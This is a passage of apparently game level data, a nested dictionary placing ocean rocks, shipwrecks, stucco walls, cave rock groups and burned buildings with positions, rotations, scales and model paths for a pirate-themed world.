Point3(-739.855, 82.339, 4.01),'Scale': VBase3(4.24, 4.24, 4.24),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_c'}},'1273091884.67akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(70.466, 0.0, 0.0),'Pos': Point3(-512.176, 452.931, 4.01),'Scale': VBase3(2.723, 2.723, 2.723),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_c'}},'1273091886.73akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(846.065, 109.503, 4.01),'Scale': VBase3(2.86, 2.86, 2.86),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_c'}},'1273091888.0akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-520.118, 878.285, 4.01),'Scale': VBase3(1.567, 1.567, 
1.567),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_c'}},'1273091891.72akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-1036.701, 167.916, 4.017),'Scale': VBase3(1.567, 1.567, 1.567),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_d'}},'1273091893.66akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(83.594, 1012.43, 4.01),'Scale': VBase3(1.567, 1.567, 1.567),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_d'}},'1273091899.75akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(84.048, 0.0, 0.0),'Pos': Point3(-932.266, -2.44, 4.009),'Scale': VBase3(3.274, 3.274, 3.274),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_a'}},'1273091901.5akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(121.925, 0.0, 0.0),'Pos': Point3(-841.015, 496.424, 4.009),'Scale': VBase3(2.507, 2.507, 2.507),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_b'}},'1273091902.91akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-115.794, 0.0, 0.0),'Pos': Point3(373.114, 1160.444, 4.007),'Scale': VBase3(2.861, 2.861, 2.861),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_a'}},'1273091904.2akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-95.606, 0.0, 0.0),'Pos': Point3(948.735, -386.822, 4.009),'Scale': VBase3(3.135, 3.135, 3.135),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_a'}},'1273091905.59akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-13.286, 0.0, 0.0),'Pos': Point3(-433.509, 1000.046, 4.011),'Scale': VBase3(1.567, 1.567, 1.567),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_a'}},'1273092494.95akelts': {'Type': 
'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-152.462, 0.0, 0.0),'Pos': Point3(-604.718, 933.696, 4.009),'Scale': VBase3(3.135, 3.135, 3.135),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_a'}},'1273092504.59akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-149.088, 0.0, 0.0),'Pos': Point3(737.206, 1157.633, 4.009),'Scale': VBase3(2.866, 2.866, 2.866),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_f'}},'1273092521.83akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-215.098, 1063.035, 4.01),'Scale': VBase3(2.86, 2.86, 2.86),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_c'}},'1273092820.69akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(224.595, 899.125, 4.01),'Scale': VBase3(1.834, 1.834, 1.834),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_b'}},'1273092917.44akelts': {'Type': 'Ship Wreck','Hpr': VBase3(-172.694, 18.329, 28.587),'Pos': Point3(-828.784, -208.333, -3.961),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_shp_wrk_sloop_fore'}},'1273093125.0akelts': {'Type': 'Ocean_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-121.391, 0.0, 0.0),'Pos': Point3(-182.392, 879.539, 4.005),'Scale': VBase3(3.494, 3.494, 3.494),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_ocn_rock_f'}},'1273093994.66akelts': {'Type': 'Ship Wreck','Hpr': VBase3(116.551, 17.282, -3.541),'Pos': Point3(-611.8, 759.119, 33.568),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_shp_wrk_sloop_fore'}},'1273095685.5akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(-146.705, -0.889, 0.004),'Pos': Point3(-469.951, 80.64, 68.103),'Scale': VBase3(1.363, 0.541, 1.0),'VisSize': '','Visual': {'Color': 
(0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/buildings/TallWallStucco_Broken20'}},'1273096169.53akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(-57.765, -0.013, 0.889),'Pos': Point3(-493.175, 64.579, 72.836),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.5, 0.5, 0.5, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTallColumn'}},'1273096197.31akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(302.235, 359.987, 0.889),'Pos': Point3(-442.326, -16.057, 72.125),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTallColumn'}},'1273096243.31akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(36.399, 0.888, -0.052),'Pos': Point3(-442.329, -16.052, 71.718),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/TallWallStucco_Broken20'}},'1273096339.62akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(36.399, 0.888, -0.052),'Pos': Point3(-426.234, -4.186, 71.736),'Scale': VBase3(1.423, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/TallWallStucco_Cracked20'}},'1273096383.28akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(84.151, 0.559, -0.692),'Pos': Point3(-402.529, 12.562, 70.327),'Scale': VBase3(1.423, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTall20_burned'}},'1273096397.64akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(96.876, 0.393, -0.798),'Pos': Point3(-399.917, 40.149, 70.554),'Scale': VBase3(1.423, 1.0, 1.127),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTallColumn'}},'1273096448.37akelts': {'Type': 'Spanish 
Walls','DisableCollision': False,'Hpr': VBase3(-55.894, 0.016, 0.889),'Pos': Point3(-432.786, 89.182, 67.272),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.6, 0.65, 0.7, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTallColumn_burned'}},'1273096512.7akelts': {'Type': 'Arch','Hpr': VBase3(123.416, 0.0, 0.0),'Pos': Point3(-408.546, 53.364, 72.666),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.8999999761581421, 0.8999999761581421, 0.8999999761581421, 1.0),'Model': 'models/buildings/spanish_archB'}},'1273096619.89akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(-57.765, -0.013, 0.889),'Pos': Point3(-451.142, -1.304, 72.505),'Scale': VBase3(1.6, 0.69, 0.87),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/TallWallStucco_Broken10'}},'1273096651.64akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(-55.894, 0.016, 0.889),'Pos': Point3(-417.56, 66.204, 69.944),'Scale': VBase3(1.264, 1.014, 0.87),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTallColumn'}},'1273096725.8akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(-57.765, -0.013, 0.889),'Pos': Point3(-492.683, 63.8, 72.821),'Scale': VBase3(1.264, 0.41, 0.87),'VisSize': '','Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0),'Model': 'models/buildings/TallWallStucco_Cracked20'}},'1273096809.36akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(124.258, -0.018, -0.889),'Pos': Point3(-418.056, 67.039, 68.062),'Scale': VBase3(1.264, 0.677, 0.87),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTall20_burned'}},'1273096858.19akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(153.718, -0.453, -0.765),'Pos': Point3(-433.707, 89.848, 68.491),'Scale': VBase3(1.264, 0.677, 
0.87),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTall10_burned'}},'1273096915.0akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(-2.409, 0.724, 0.516),'Pos': Point3(-446.137, 95.9, 68.675),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.601, 0.652, 0.699, 1.0),'Model': 'models/buildings/pir_m_bld_wal_stuccoTallColumn_burned'}},'1273096950.17akelts': {'Type': 'Spanish Walls','DisableCollision': False,'Hpr': VBase3(-146.705, -0.889, 0.004),'Pos': Point3(-447.168, 95.603, 68.105),'Scale': VBase3(1.363, 0.541, 1.0),'VisSize': '','Visual': {'Color': (0.4000000059604645, 0.4000000059604645, 0.4000000059604645, 1.0),'Model': 'models/buildings/TallWallStucco_Broken20'}},'1273097195.03akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(124.27, 0.0, 0.0),'Pos': Point3(-234.108, -316.147, 101.182),'RenderEffect': False,'Scale': VBase3(1.942, 1.942, 1.942),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_b'}},'1273097229.58akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(5.731, -18.784, -93.689),'Pos': Point3(-165.524, 42.236, 194.414),'RenderEffect': False,'Scale': VBase3(1.69, 1.69, 1.69),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1273097295.27akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-130.883, -26.026, 0.0),'Pos': Point3(693.728, -218.907, 154.885),'RenderEffect': False,'Scale': VBase3(1.468, 1.468, 1.468),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1273097340.39akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-151.648, 0.0, 0.0),'Pos': Point3(-161.634, -134.04, 101.992),'RenderEffect': False,'Scale': VBase3(1.326, 1.326, 
1.326),'VisSize': '','Visual': {'Color': (0.484, 0.545, 0.637, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1273097382.52akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-83.949, -3.312, 0.333),'Pos': Point3(-84.234, 586.083, 26.414),'RenderEffect': False,'Scale': VBase3(2.196, 2.196, 2.196),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1273097482.17akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(132.521, 3.357, 13.41),'Pos': Point3(-331.969, 465.304, -2.236),'RenderEffect': False,'Scale': VBase3(2.167, 2.167, 2.167),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1273097538.3akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-144.29, 1.428, -5.465),'Pos': Point3(-530.097, 94.256, 71.854),'RenderEffect': False,'Scale': VBase3(4.47, 4.47, 4.47),'VisSize': '','Visual': {'Color': (0.58, 0.64, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_l'}},'1273097599.77akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-61.516, 0.0, 0.0),'Pos': Point3(-382.52, 0.496, 63.488),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1273097723.86akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(148.395, -8.891, 0.0),'Pos': Point3(-585.031, 369.323, -6.635),'RenderEffect': False,'Scale': VBase3(1.513, 1.513, 1.513),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1273097816.3akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-94.459, 0.0, -0.569),'Pos': Point3(-608.14, 172.708, 65.088),'RenderEffect': False,'Scale': VBase3(2.699, 2.699, 2.699),'VisSize': 
'','Visual': {'Color': (0.58, 0.64, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_h'}},'1273097904.06akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(105.874, -2.73, 0.0),'Pos': Point3(-599.051, 52.412, 55.301),'RenderEffect': False,'Scale': VBase3(1.976, 1.976, 1.976),'VisSize': '','Visual': {'Color': (0.58, 0.64, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1273098024.53akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(73.37, 0.0, 0.0),'Pos': Point3(-85.086, -261.118, 101.18),'RenderEffect': False,'Scale': VBase3(1.69, 1.69, 1.69),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1273098331.05akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-9.77, 0.0, 0.0),'Pos': Point3(468.476, -97.47, -1.737),'RenderEffect': False,'Scale': VBase3(1.326, 1.326, 1.326),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1273098381.94akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(82.271, 0.0, 0.0),'Pos': Point3(307.113, 458.935, 217.203),'RenderEffect': False,'Scale': VBase3(1.326, 1.326, 1.326),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1273098431.81akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(92.791, 0.0, 0.0),'Pos': Point3(461.181, -388.523, 164.922),'RenderEffect': False,'Scale': VBase3(1.783, 1.783, 1.783),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1273098505.0akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(8.885, 11.695, 22.963),'Pos': Point3(613.174, 167.386, 198.856),'RenderEffect': False,'Scale': VBase3(0.945, 0.945, 0.945),'VisSize': '','Visual': {'Color': (0.58, 
0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1273098649.62akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-26.12, 3.652, 10.575),'Pos': Point3(503.825, 431.405, 181.5),'RenderEffect': False,'Scale': VBase3(1.482, 1.482, 1.482),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1273098753.55akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-69.292, -15.161, 0.0),'Pos': Point3(481.867, -169.883, 173.434),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1273098833.67akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(158.628, 0.0, 0.0),'Pos': Point3(703.688, -316.505, -1.45),'RenderEffect': False,'Scale': VBase3(1.576, 1.576, 1.576),'VisSize': '','Visual': {'Color': (0.526, 0.654, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_b'}},'1273098914.44akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.245, -1.931, 7.23),'Pos': Point3(277.582, 68.431, -4.215),'RenderEffect': False,'Scale': VBase3(2.635, 2.635, 2.635),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_tall'}},'1273099012.62akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-4.218, -9.873, 9.596),'Pos': Point3(195.376, -65.076, 41.22),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_b'}},'1273099299.83akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(-136.734, -12.445, 0.0),'Pos': Point3(47.576, -87.691, 81.878),'RenderEffect': False,'Scale': VBase3(1.502, 1.502, 1.502),'VisSize': '','Visual': {'Color': (0.38, 0.399, 0.5, 
1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1273099391.45akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(107.43, 0.0, 0.0),'Pos': Point3(-40.778, -116.336, 89.904),'RenderEffect': False,'Scale': VBase3(2.053, 2.053, 2.053),'VisSize': '','Visual': {'Color': (0.416, 0.469, 0.548, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_b'}},'1273099499.47akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(67.716, 0.0, 3.126),'Pos': Point3(-348.91, -196.611, 106.082),'RenderEffect': False,'Scale': VBase3(7.809, 7.809, 9.016),'VisSize': '','Visual': {'Color': (0.58, 0.64, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_f'}},'1273170865.64akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273170865.64akelts0','Holiday': '','Hpr': VBase3(-73.141, -0.262, 10.777),'Pos': Point3(-30.34, -48.556, 94.382),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_gate','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273170904.98akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273170904.98akelts0','Holiday': '','Hpr': VBase3(93.721, 5.187, 0.0),'Pos': Point3(-51.398, -40.174, 97.075),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_half_house','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273171053.22akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273171053.22akelts0','Holiday': '','Hpr': VBase3(-133.758, -21.36, 0.0),'Pos': Point3(-49.897, -57.986, 96.218),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_woods','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273171125.73akelts': {'Type': 'Building Exterior','File': '','ExtUid': '1273171125.73akelts0','Holiday': 
'','Hpr': VBase3(-112.315, 1.107, -3.738),'Pos': Point3(-524.407, 109.947, 71.589),'Scale': VBase3(0.838, 0.838, 0.838),'VisSize': '','Visual': {'Door': 'models/buildings/shanty_guildhall_door','Model': 'models/buildings/burned_house','SignImage': 'models/buildings/sign1_eng_a_icon_barber'}},'1273171584.94akelts': {'Type': 'Burnt_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-313.245, -201.343, 111.34),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/vegetation/gen_tree_trunk_only_tall_burnt'}},'1273171595.62akelts': {'Type': 'Burnt_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(2.715, -1.495, -1.355),'Pos': Point3(264.379, 604.245, 24.025),'Scale': VBase3(0.843, 0.843, 0.843),'VisSize': '','Visual': {'Color': (0.6000000238418579, 0.6000000238418579, 0.6000000238418579, 1.0),'Model': 'models/props/pir_m_prp_grp_barrelsE_burned'}},'1273171752.0akelts': {'Type': 'Cave_Props','DisableCollision': True,'Holiday': '','Hpr': VBase3(118.721, 0.0, 13.816),'Pos': Point3(-473.916, 320.719, 49.888),'RenderEffect': False,'Scale': VBase3(1.722, 1.722, 1.722),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1273179202.86akelts': {'Type': 'Ship Wreck','DisableCollision': False,'Holiday': '','Hpr': VBase3(-82.219, 0.0, 0.0),'Pos': Point3(577.128, -289.54, -4.037),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_shp_wrk_carrack'}},'1273179694.97akelts': {'Type': 'Ship Wreck','DisableCollision': False,'Holiday': '','Hpr': VBase3(159.68, 0.0, 0.0),'Pos': Point3(-1008.039, 342.592, -16.164),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_shp_wrk_mastC'}},'1273179724.13akelts': {'Type': 'Ship Wreck','DisableCollision': False,'Holiday': '','Hpr': VBase3(38.417, 0.0, 0.0),'Pos': Point3(-518.997, 1011.182, -17.704),'Scale': VBase3(1.0, 1.0, 
1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_shp_wrk_mastA'}},'1273179750.3akelts': {'Type': 'Ship Wreck','DisableCollision': False,'Holiday': '','Hpr': VBase3(-7.187, 0.0, 0.0),'Pos': Point3(426.648, 1156.301, -5.358),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Model': 'models/props/pir_m_shp_wrk_mastB'}},'1273180067.83akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-66.318, 0.998, -4.407),'Objects': {'1273620729.81akelts': {'Type': 'Volcano','DisableCollision': False,'GridPos': Point3(-152.423, 52.758, 84.76),'Holiday': '','Hpr': VBase3(66.271, 3.635, 2.686),'Pos': Point3(-2.777, 3.665, 0.245),'Scale': VBase3(0.498, 0.498, 0.498),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_vol_bush_a'}}},'Pos': Point3(-164.596, 30.851, 84.243),'RenderEffect': False,'Scale': VBase3(5.444, 5.444, 5.444),'VisSize': '','Visual': {'Color': (0.375, 0.422, 0.493, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_l'}},'1273180242.13akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(104.142, -1.92, 5.189),'Pos': Point3(390.668, -76.892, 12.204),'RenderEffect': False,'Scale': VBase3(2.826, 2.826, 2.826),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_j'}},'1273180302.47akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-30.435, -19.103, 0.147),'Pos': Point3(280.498, -23.357, 1.174),'RenderEffect': False,'Scale': VBase3(2.495, 2.495, 2.495),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rock_h'}},'1273180471.44akelts': {'Type': 'Ship Wreck','DisableCollision': False,'Holiday': '','Hpr': VBase3(41.058, 0.0, 0.0),'Pos': Point3(359.486, 878.795, -0.184),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.85, 1.0, 0.9, 1.0),'Model': 'models/props/pir_m_shp_wrk_galleon'}},'1273180567.09akelts': {'Type': 
'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-171.453, -12.164, 10.912),'Pos': Point3(685.158, 222.579, 204.875),'RenderEffect': False,'Scale': VBase3(1.645, 1.645, 1.645),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1273180750.5akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(74.945, 0.0, 0.0),'Pos': Point3(514.333, 295.995, 160.385),'RenderEffect': False,'Scale': VBase3(3.011, 3.011, 3.011),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_g'}},'1273180847.2akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(469.798, 414.593, 259.328),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_stite_med'}},'1273180893.11akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(535.348, 506.286, 175.733),'RenderEffect': False,'Scale': VBase3(0.67, 0.67, 0.67),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_column_large'}},'1273180952.45akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(145.701, 0.0, 0.0),'Pos': Point3(591.849, 453.019, 169.878),'RenderEffect': False,'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.411, 0.463, 0.541, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}},'1273180978.08akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(125.337, 0.0, 0.0),'Pos': Point3(511.265, 211.404, 155.191),'RenderEffect': False,'Scale': VBase3(1.391, 1.391, 1.391),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroupIron_f'}},'1273181103.83akelts': {'Type': 'Cave_Props','DisableCollision': 
False,'Holiday': '','Hpr': VBase3(-178.252, 28.302, 179.306),'Pos': Point3(488.843, 497.85, 241.915),'RenderEffect': False,'Scale': VBase3(4.259, 4.259, 4.259),'VisSize': '','Visual': {'Color': (0.391, 0.44, 0.514, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_k'}},'1273181198.34akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(129.976, 0.0, 0.0),'Pos': Point3(586.724, 531.356, 171.906),'RenderEffect': False,'Scale': VBase3(0.577, 0.577, 0.577),'VisSize': '','Visual': {'Color': (0.468, 0.527, 0.616, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroupIron_a'}},'1273181245.44akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(110.545, 0.0, 0.0),'Pos': Point3(471.26, 260.86, 161.551),'RenderEffect': False,'Scale': VBase3(0.577, 0.577, 0.577),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.77, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroupIron_b'}},'1273181306.47akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-49.828, 13.398, -93.118),'Pos': 